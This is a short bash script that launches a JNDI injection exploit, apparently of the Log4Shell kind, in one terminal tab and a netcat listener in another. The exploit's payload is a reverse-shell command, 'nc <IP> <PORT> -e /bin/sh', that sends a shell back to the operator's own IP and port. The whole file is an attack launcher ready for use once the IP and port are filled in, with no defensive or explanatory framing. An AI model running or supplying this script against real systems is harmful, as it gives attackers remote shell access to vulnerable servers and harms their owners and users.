#!/bin/bash
#We could have used screens or tmux, but for siplicity we used gnome-terminal to spawn some more tabs
#Replace <IP> and <PORT> with your own IP and port that you wis to listen on. Makes sure all values are identical all places

gnome-terminal --tab -- /bin/bash -c 'java -jar ./JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc <IP> <PORT> -e /bin/sh" -A <IP>; bash'

gnome-terminal --tab -- /bin/bash -c 'nc -lvnp <PORT>'
